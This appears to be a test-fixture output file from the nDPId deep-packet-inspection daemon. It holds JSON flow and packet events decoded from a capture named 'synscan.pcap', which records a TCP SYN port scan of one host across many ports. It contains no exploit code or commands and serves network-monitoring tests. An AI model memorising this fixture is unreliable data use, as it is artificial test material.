-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":918,"source":"synscan.pcap","alias":"nDPId-test","flow_id":909,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059895,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5901,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":918,"source":"synscan.pcap","alias":"nDPId-test","flow_id":909,"flow_packet_id":1,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059895,"pkt":"ACYLMQczACWzv5HuCABFAAAsGWQAADcG+A6sEAAIQA2GNIzTFw3dU4MZAAAAAGACEAARfwAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":919,"source":"synscan.pcap","alias":"nDPId-test","flow_id":910,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059895,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":481,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":919,"source":"synscan.pcap","alias":"nDPId-test","flow_id":910,"flow_packet_id":1,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059895,"pkt":"ACYLMQczACWzv5HuCABFAAAsmC0AACkGh0WsEAAIQA2GNIzTAeHdU4MZAAAAAGACCAAuqwAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":920,"source":"synscan.pcap","alias":"nDPId-test","flow_id":911,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059895,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1066,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":920,"source":"synscan.pcap","alias":"nDPId-test","flow_id":911,"flow_packet_id":1,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059895,"pkt":"ACYLMQczACWzv5HuCABFAAAsqo0AADAGbeWsEAAIQA2GNIzTBCrdU4MZAAAAAGACBAAwYgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":921,"source":"synscan.pcap","alias":"nDPId-test","flow_id":912,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059896,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5280,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":921,"source":"synscan.pcap","alias":"nDPId-test","flow_id":912,"flow_packet_id":1,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059896,"pkt":"ACYLMQczACWzv5HuCABFAAAsj2EAADAGiRGsEAAIQA2GNIzTFKDdU4MZAAAAAGACBAAf7AAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":922,"source":"synscan.pcap","alias":"nDPId-test","flow_id":913,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059896,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7778,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":922,"source":"synscan.pcap","alias":"nDPId-test","flow_id":913,"flow_packet_id":1,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059896,"pkt":"ACYLMQczACWzv5HuCABFAAAsTgwAADAGymasEAAIQA2GNIzSHmLdUoMYAAAAAGACBAAWLQAAAgQFtA=="} 
-00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":923,"source":"synscan.pcap","alias":"nDPId-test","flow_id":914,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059896,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":987,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":923,"source":"synscan.pcap","alias":"nDPId-test","flow_id":914,"flow_packet_id":1,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059896,"pkt":"ACYLMQczACWzv5HuCABFAAAspWAAADAGcxKsEAAIQA2GNIzSA9vdUoMYAAAAAGACBAAwtAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":924,"source":"synscan.pcap","alias":"nDPId-test","flow_id":915,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059896,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5679,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":924,"source":"synscan.pcap","alias":"nDPId-test","flow_id":915,"flow_packet_id":1,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059896,"pkt":"ACYLMQczACWzv5HuCABFAAAsErEAADIGA8KsEAAIQA2GNIzSFi\/dUoMYAAAAAGACDAAWYAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":925,"source":"synscan.pcap","alias":"nDPId-test","flow_id":916,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059896,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8180,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":925,"source":"synscan.pcap","alias":"nDPId-test","flow_id":916,"flow_packet_id":1,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059896,"pkt":"ACYLMQczACWzv5HuCABFAAAsop0AADoGa9WsEAAIQA2GNIzSH\/TdUoMYAAAAAGACDAAMmwAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":926,"source":"synscan.pcap","alias":"nDPId-test","flow_id":917,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059896,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4279,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":926,"source":"synscan.pcap","alias":"nDPId-test","flow_id":917,"flow_packet_id":1,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059896,"pkt":"ACYLMQczACWzv5HuCABFAAAslLkAADMGgLmsEAAIQA2GNIzSELfdUoMYAAAAAGACEAAX2AAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":927,"source":"synscan.pcap","alias":"nDPId-test","flow_id":918,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059896,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":14441,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":927,"source":"synscan.pcap","alias":"nDPId-test","flow_id":918,"flow_packet_id":1,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059896,"pkt":"ACYLMQczACWzv5HuCABFAAAsXlUAACcGwx2sEAAIQA2GNIzSOGndUoMYAAAAAGACEADwJQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":928,"source":"synscan.pcap","alias":"nDPId-test","flow_id":919,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059896,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":44443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":928,"source":"synscan.pcap","alias":"nDPId-test","flow_id":919,"flow_packet_id":1,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059896,"pkt":"ACYLMQczACWzv5HuCABFAAAsVpgAAC4Gw9qsEAAIQA2GNIzSrZvdUoMYAAAAAGACDAB+8wAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":929,"source":"synscan.pcap","alias":"nDPId-test","flow_id":920,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059896,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9618,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":929,"source":"synscan.pcap","alias":"nDPId-test","flow_id":920,"flow_packet_id":1,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059896,"pkt":"ACYLMQczACWzv5HuCABFAAAsXgQAADAGum6sEAAIQA2GNIzSJZLdUoMYAAAAAGACBAAO\/QAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":930,"source":"synscan.pcap","alias":"nDPId-test","flow_id":921,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059896,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2301,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":930,"source":"synscan.pcap","alias":"nDPId-test","flow_id":921,"flow_packet_id":1,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059896,"pkt":"ACYLMQczACWzv5HuCABFAAAsjFAAADcGhSKsEAAIQA2GNIzSCP3dUoMYAAAAAGACEAAfkgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":931,"source":"synscan.pcap","alias":"nDPId-test","flow_id":922,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059896,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":931,"source":"synscan.pcap","alias":"nDPId-test","flow_id":922,"flow_packet_id":1,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059896,"pkt":"ACYLMQczACWzv5HuCABFAAAsL8IAADcG4bCsEAAIQA2GNIzSxnDdUoMYAAAAAGACEABiHgAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":932,"source":"synscan.pcap","alias":"nDPId-test","flow_id":923,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059896,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":932,"source":"synscan.pcap","alias":"nDPId-test","flow_id":923,"flow_packet_id":1,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059896,"pkt":"ACYLMQczACWzv5HuCABFAAAsMfQAADUG4X6sEAAIQA2GNIzSH0rdUoMYAAAAAGACCAARRQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":933,"source":"synscan.pcap","alias":"nDPId-test","flow_id":924,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059955,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":933,"source":"synscan.pcap","alias":"nDPId-test","flow_id":924,"flow_packet_id":1,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059955,"pkt":"ACYLMQczACWzv5HuCABFAAAs20cAACgGRSusEAAIQA2GNIzTJqzdU4MZAAAAAGACBAAN4AAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":934,"source":"synscan.pcap","alias":"nDPId-test","flow_id":925,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059955,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1974,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":934,"source":"synscan.pcap","alias":"nDPId-test","flow_id":925,"flow_packet_id":1,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059955,"pkt":"ACYLMQczACWzv5HuCABFAAAsr4EAACgGcPGsEAAIQA2GNIzTB7bdU4MZAAAAAGACBAAs1gAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":935,"source":"synscan.pcap","alias":"nDPId-test","flow_id":926,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059955,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9968,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":935,"source":"synscan.pcap","alias":"nDPId-test","flow_id":926,"flow_packet_id":1,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059955,"pkt":"ACYLMQczACWzv5HuCABFAAAsGqAAADAG\/dKsEAAIQA2GNIzTJvDdU4MZAAAAAGACBAANnAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":936,"source":"synscan.pcap","alias":"nDPId-test","flow_id":927,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059955,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":12345,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":936,"source":"synscan.pcap","alias":"nDPId-test","flow_id":927,"flow_packet_id":1,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059955,"pkt":"ACYLMQczACWzv5HuCABFAAAsirAAACYGl8KsEAAIQA2GNIzTMDndU4MZAAAAAGACDAD8UgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":937,"source":"synscan.pcap","alias":"nDPId-test","flow_id":928,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059955,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":15002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":937,"source":"synscan.pcap","alias":"nDPId-test","flow_id":928,"flow_packet_id":1,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059955,"pkt":"ACYLMQczACWzv5HuCABFAAAsQVwAACoG3RasEAAIQA2GNIzTOprdU4MZAAAAAGACDADx8QAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":938,"source":"synscan.pcap","alias":"nDPId-test","flow_id":929,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059955,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":11110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":938,"source":"synscan.pcap","alias":"nDPId-test","flow_id":929,"flow_packet_id":1,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059955,"pkt":"ACYLMQczACWzv5HuCABFAAAsW1IAADcGtiCsEAAIQA2GNIzTK2bdU4MZAAAAAGACEAD9JQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":939,"source":"synscan.pcap","alias":"nDPId-test","flow_id":930,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059955,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":12174,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":939,"source":"synscan.pcap","alias":"nDPId-test","flow_id":930,"flow_packet_id":1,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059955,"pkt":"ACYLMQczACWzv5HuCABFAAAsZJ0AACUGvtWsEAAIQA2GNIzTL47dU4MZAAAAAGACCAAA\/gAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":940,"source":"synscan.pcap","alias":"nDPId-test","flow_id":931,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059955,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1192,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":940,"source":"synscan.pcap","alias":"nDPId-test","flow_id":931,"flow_packet_id":1,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059955,"pkt":"ACYLMQczACWzv5HuCABFAAAsrSEAACcGdFGsEAAIQA2GNIzTBKjdU4MZAAAAAGACEAAj5AAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":941,"source":"synscan.pcap","alias":"nDPId-test","flow_id":932,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059955,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1600,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":941,"source":"synscan.pcap","alias":"nDPId-test","flow_id":932,"flow_packet_id":1,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059955,"pkt":"ACYLMQczACWzv5HuCABFAAAshwoAADsGhmisEAAIQA2GNIzTBkDdU4MZAAAAAGACEAAiTAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":942,"source":"synscan.pcap","alias":"nDPId-test","flow_id":933,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059955,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3766,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
